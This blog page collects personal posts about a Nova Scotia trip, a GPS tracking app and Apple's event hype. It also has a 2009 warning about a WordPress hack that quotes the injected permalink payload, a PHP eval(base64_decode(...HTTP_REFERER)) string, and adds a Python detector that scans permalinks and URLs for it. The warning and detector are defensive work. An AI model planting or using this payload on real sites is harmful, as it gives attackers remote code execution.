On the Bluenose II… and ducks

Irene and I are on day two of our vacation to Nova Scotia. So far, I am having a lot of fun. We’ve flown too far, eaten too much, and now I have wind burn. In my previous post I provided a link to our travel “map”: in theory, it is supposed to be updated in near real time, but for some reason it stopped updating yesterday. I forced it to update earlier this evening, but don’t have a lot of faith that it will keep working going forward.

Today I have uploaded my first batch of pictures…


In case you want to follow our trip…

I installed a little “trip tracker” app on my BlackBerry before I left. It is called GPSed and, other than the fact that it seems to have a dickens of a time getting a GPS lock at times, it works pretty well. Note that the GPS lock problem is really an issue with the BlackBerry- however, the BB also has a cell tower location system that other apps use (e.g.: my weather app, BeWeather).

You can follow our trip here=> http://gpsed.com/track/2776748136093189273 . Since I upgraded to the “professional” version of GPSed, I will now be able to annotate the waypoints with photos from my phone. Yay! And note that the map is powered by Google Maps, which means you can zoom in like crazy.

Packing up…

I’m organizing my electronics, clothing, and sundries for our trip to Nova Scotia. The plane leaves at around 7:30 PM tomorrow, and we arrive in Halifax at about 6:30 am or some similar ungodly hour- I’m only vaguely aware of the actual itinerary.

The actual details of the travel are not that interesting to me at the moment. The important stuff, of course, is what to take and what to do when we get there.


Apple really likes those adjectives…

I found this on Gizmodo today, and when I watched the video I couldn’t help laughing out loud…

It is really awesomely incredibly great and unbelievable!

The video is extracted from the most recent (September 9th) Apple event, which was focussed on what I can only describe as a completely boring list of iPod announcements. There was nothing released that was “gee-whiz” like the iPhone, just minor incremental updates to existing product lines. Yet as is evidenced by this video, the Apple team worked hard to make it seem like they were revolutionizing the entire world.

I have to wonder how carefully the Apple folks craft and coach these kinds of over-the-top exuberant love-fests. I can’t imagine that this happens “naturally” or by accident. And it explains why the comparatively subdued presentations given by other companies seem so dour and boring in comparison.

WordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

If you are running a WordPress based blog like I am and suddenly notice your post URLs have something “extra” appended (see the subject line), your blog has been hacked.

You can read more about it here (thanks, UCLABoyz, thanks schang!), where you will also find guidance regarding cleaning the problem up. Unfortunately, it appears that the hack works on all versions of WordPress up to and including the most recent.

I have BadBehavior installed on my blog, and so it was rejecting the URLs with this addition which I *think* would be thwarting the hackers involved: they hadn’t been able to create an administrative user. Unfortunately, it also meant none of my blog posts were working properly until I noticed the problem and corrected it.

Hopefully WordPress will issue a fix for this soon - in the meantime, keep an eye on your URLs, WordPress bloggers!

UPDATE: Another link to a lengthy thread regarding this hack on the WordPress.org site. What is interesting here is the apparent vector: a weakness in the WordPress code, apparently up to and including the most recent release, that permits an ordinary subscriber (i.e.: not an administrative user) to run some administrator features e.g.: changing the permalinks.

UPDATE #2: it appears that updating to the most recent version of WordPress (2.8.4) removes the “double slash” vector for running some admin commands (notably permalink.php). This fix was apparently added somewhere between WordPress version 2.8 and 2.8.4.
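One way to automate the "keep an eye on your URLs" check, as an added example that is not part of the original post: it validates a permalink structure value and scans URLs for the PHP tokens in the string from the post title. The tag list and the `permalink_structure` option name come from general WordPress knowledge rather than from this post, and the function names, sample structure and `blog.example` URLs are constructed for illustration.

```python
import re
from urllib.parse import quote, unquote

# String from this post's title, used here only as a detection sample.
INDICATOR = "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/"
ENCODED = quote(INDICATOR, safe="")  # same string as it may look percent-encoded

# Structure tags WordPress accepts in permalink_structure (assumption: not from the post).
VALID_TAGS = {"%year%", "%monthnum%", "%day%", "%hour%", "%minute%", "%second%",
              "%post_id%", "%postname%", "%category%", "%author%"}
TAG = re.compile(r"%[a-z_]+%")
# PHP tokens that have no business in a URL or a permalink structure.
CODE_MARKERS = re.compile(
    r"\$\{|\beval\s*\(|base64_decode|\$_SERVER|HTTP_REFERER", re.I)
# Characters expected between tags in a clean structure.
LITERAL_OK = re.compile(r"[A-Za-z0-9/_.\-]*")

def check_permalink_structure(structure):
    """Return a list of findings; an empty list means the value looks clean."""
    findings = []
    if CODE_MARKERS.search(structure):
        findings.append("php-code-marker")
    unknown = sorted(set(TAG.findall(structure)) - VALID_TAGS)
    if unknown:
        findings.append("unknown-tag:" + ",".join(unknown))
    # Whatever is left after removing tags must be plain path characters.
    if not LITERAL_OK.fullmatch(TAG.sub("", structure)):
        findings.append("unexpected-characters")
    return findings

def suspicious_urls(urls):
    """Return the URLs (from a crawl or an access log) that carry the tokens."""
    hits = []
    for url in urls:
        # Decode twice in case the logged URL is percent-encoded (assumption).
        decoded = unquote(unquote(url))
        if CODE_MARKERS.search(decoded):
            hits.append(url)
    return hits

if __name__ == "__main__":
    clean = "/%year%/%monthnum%/%postname%/"       # constructed sample
    base = "http://blog.example/2009/09/hello/"    # constructed sample
    print(check_permalink_structure(clean))
    print(check_permalink_structure(clean + INDICATOR))
    print(suspicious_urls([base, base + INDICATOR, base + ENCODED]))
```

Run the structure check against the stored permalink setting and the URL check against recent access-log entries or a crawl of your own post links.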

I’ve included some extracts from my server logs and further thoughts below…
